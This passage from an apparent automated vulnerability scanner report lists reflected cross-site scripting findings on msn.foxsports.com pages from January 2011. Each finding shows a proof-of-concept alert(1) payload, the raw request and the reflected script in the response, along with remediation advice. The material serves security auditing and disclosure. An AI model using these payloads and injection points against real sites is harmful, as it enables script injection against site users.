<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- esi: /nugget/10088_209_moneyline17502--><a>7c62d5583cc_boxing-->
...[SNIP]...

3.8. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611 [gt1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

Issue detail

The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbd9e'-alert(1)-'7cb6c89dc04 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611?gt1=39002cbd9e'-alert(1)-'7cb6c89dc04 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 244677
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=29
Date: Sat, 08 Jan 2011 01:13:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
pt>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611?gt1=39002cbd9e'-alert(1)-'7cb6c89dc04';

       startComments('StoryComments', '24828042'); // load up team comments
   </script>
...[SNIP]...

3.9. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd92'-alert(1)-'c38e52b2865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(1)-'c38e52b2865=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248882
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=C19EFDA1529F318D4DF0EBF807C6C548; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=52
Date: Fri, 07 Jan 2011 21:52:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(1)-'c38e52b2865=1';

       startComments('StoryComments', '24821005'); // load up team comments
   </script>
...[SNIP]...

3.10. http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e7a8'-alert(1)-'2ad1a22d113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611?9e7a8'-alert(1)-'2ad1a22d113=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 242053
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=62875BBB2A5D21448AA0F658C82DA2CB; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=130
Date: Fri, 07 Jan 2011 21:53:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611?9e7a8'-alert(1)-'2ad1a22d113=1';

       startComments('StoryComments', '24828000'); // load up team comments
   </script>
...[SNIP]...

3.11. http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby- [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /horseracing/story/the-road-to-the-2010-kentucky-derby-

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7322e'-alert(1)-'6457fd1c49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /horseracing/story/the-road-to-the-2010-kentucky-derby-?7322e'-alert(1)-'6457fd1c49a=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227143
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=132
Date: Sat, 08 Jan 2011 01:31:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby-?7322e'-alert(1)-'6457fd1c49a=1';

       startComments('StoryComments', '11046872'); // load up team comments
   </script>
...[SNIP]...

3.12. http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af6e2'-alert(1)-'c7767af3893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611?af6e2'-alert(1)-'c7767af3893=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 251122
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=0A4C6D134A054BC15DDD0280414AD42C; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=33
Date: Fri, 07 Jan 2011 21:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611?af6e2'-alert(1)-'c7767af3893=1';

       startComments('StoryComments', '24815041'); // load up team comments
   </script>
...[SNIP]...

3.13. http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4119b'-alert(1)-'9a92252279d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343?4119b'-alert(1)-'9a92252279d=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248880
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D255464292004BD4E9542E619E3416EB; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343?4119b'-alert(1)-'9a92252279d=1';

       startComments('StoryComments', '24821011'); // load up team comments
   </script>
...[SNIP]...

3.14. http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe65'-alert(1)-'f79ffb350df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611?4fe65'-alert(1)-'f79ffb350df=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 247565
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=C24355AA81DD2D21081440E451A7829A; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611?4fe65'-alert(1)-'f79ffb350df=1';

       startComments('StoryComments', '24809000'); // load up team comments
   </script>
...[SNIP]...

3.15. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [gt1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

Issue detail

The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5469e'-alert(1)-'576963262f4 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?gt1=390025469e'-alert(1)-'576963262f4 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252245
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A2C889D95FE4805EF0ADFF6AEEC81927; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?gt1=390025469e'-alert(1)-'576963262f4';

       startComments('StoryComments', '24800150'); // load up team comments
   </script>
...[SNIP]...

3.16. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49bdc'-alert(1)-'91e70ffe29d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?49bdc'-alert(1)-'91e70ffe29d=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252224
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=7B8874ABAE32C8C770CE34A689CD82E1; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=32
Date: Fri, 07 Jan 2011 21:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610?49bdc'-alert(1)-'91e70ffe29d=1';

       startComments('StoryComments', '24800150'); // load up team comments
   </script>
...[SNIP]...

3.17. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [gt1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /other/gallery/Week-in-sports-photos-010611

Issue detail

The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86805'-alert(1)-'a388482b84b was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /other/gallery/Week-in-sports-photos-010611?gt1=3900286805'-alert(1)-'a388482b84b HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 232586
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=19
Date: Sat, 08 Jan 2011 01:10:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611?gt1=3900286805'-alert(1)-'a388482b84b';

       startComments('StoryComments', '198'); // load up team comments
   </script>
...[SNIP]...

3.18. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /other/gallery/Week-in-sports-photos-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d3e'-alert(1)-'44b3f0585db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /other/gallery/Week-in-sports-photos-010611?10d3e'-alert(1)-'44b3f0585db=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 232579
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=23
Date: Sat, 08 Jan 2011 01:12:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611?10d3e'-alert(1)-'44b3f0585db=1';

       startComments('StoryComments', '198'); // load up team comments
   </script>
...[SNIP]...

3.19. http://msn.foxsports.com/other/page/fox-flash [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /other/page/fox-flash

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87376"%3balert(1)//1c91713f693 was submitted in the vid parameter. This input was echoed as 87376";alert(1)//1c91713f693 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /other/page/fox-flash?vid=8dc5fe25-84b5-4135-980a-7636efe6330e87376"%3balert(1)//1c91713f693&from=foxsports/home/home_gallery HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 182067
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Sat, 08 Jan 2011 01:10:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 660, 412, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "8dc5fe25-84b5-4135-980a-7636efe6330e87376";alert(1)//1c91713f693", "player.c": "v", "player.v": "8dc5fe25-84b5-4135-980a-7636efe6330e87376";alert(1)//1c91713f693", "player.fr":"iv2_en-us_foxsports_foxflash" }, 'Player1');</script>
...[SNIP]...

3.20. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27954'%3balert(1)//b86974c8f99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27954';alert(1)//b86974c8f99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?27954'%3balert(1)//b86974c8f99=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 75928
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n12 ( iad-agg-n3), ms iad-agg-n3 ( jfk-agg-n52), ms jfk-agg-n52 ( origin>CONN)
Cache-Control: max-age=3564
Expires: Sat, 08 Jan 2011 02:07:22 GMT
Date: Sat, 08 Jan 2011 01:07:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
;
var clickFunc = function(){
EZDATA.trackGaEvent('search', 'function', 'filter');
window.location='http://msn.foxsports.com/search?&27954';alert(1)//b86974c8f99=1&mediatype=Video';
return false;
};
link.bind("click", clickFunc);
link.html("More Videos ..");
});
...[SNIP]...

3.21. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ae22"%3balert(1)//42904ba53e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ae22";alert(1)//42904ba53e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?5ae22"%3balert(1)//42904ba53e8=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 76056
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n5 ( iad-agg-n35), ms iad-agg-n35 ( jfk-agg-n58), ms jfk-agg-n58 ( origin>CONN)
Cache-Control: max-age=3600
Expires: Sat, 08 Jan 2011 02:07:54 GMT
Date: Sat, 08 Jan 2011 01:07:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
mes/foundation/2.10/";
EZDATA.themeUrl = "http://multimedia.foxsports.com/FileResource//themes/projects/foxsports/5.0_5033";
EZDATA.pageUrl = "http://msn.foxsports.com/search?&5ae22";alert(1)//42904ba53e8=1";
EZDATA.baseUrl = "http://multimedia.foxsports.com/";
EZDATA.basePubUrl = "http://multimedia.foxsports.com/";
EZDATA.baseSearchUrl = "http://msn.foxsports.com/se
...[SNIP]...

3.22. http://msn.foxsports.com/search [sp_q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The value of the sp_q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87100</script><script>alert(1)</script>f3d08a24d82 was submitted in the sp_q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?sp_q=nascar_news87100</script><script>alert(1)</script>f3d08a24d82 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 67068
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n18 ( iad-agg-n35), ms iad-agg-n35 ( jfk-agg-n14), ms jfk-agg-n14 ( origin>CONN)
Cache-Control: max-age=3559
Expires: Sat, 08 Jan 2011 02:03:37 GMT
Date: Sat, 08 Jan 2011 01:04:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
var snippetTruncationLength = itemMainLength/4;
EZDATA.jsLoaderExec(EZDATA, "itemMod_truncate", snippetTruncationLength);
var searchedTerm = "nascar_news87100</script><script>alert(1)</script>f3d08a24d82";
var mediaType = "";
</script>
...[SNIP]...

3.23. http://msn.foxsports.com/video [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 934a7"%3balert(1)//81751046272 was submitted in the vid parameter. This input was echoed as 934a7";alert(1)//81751046272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

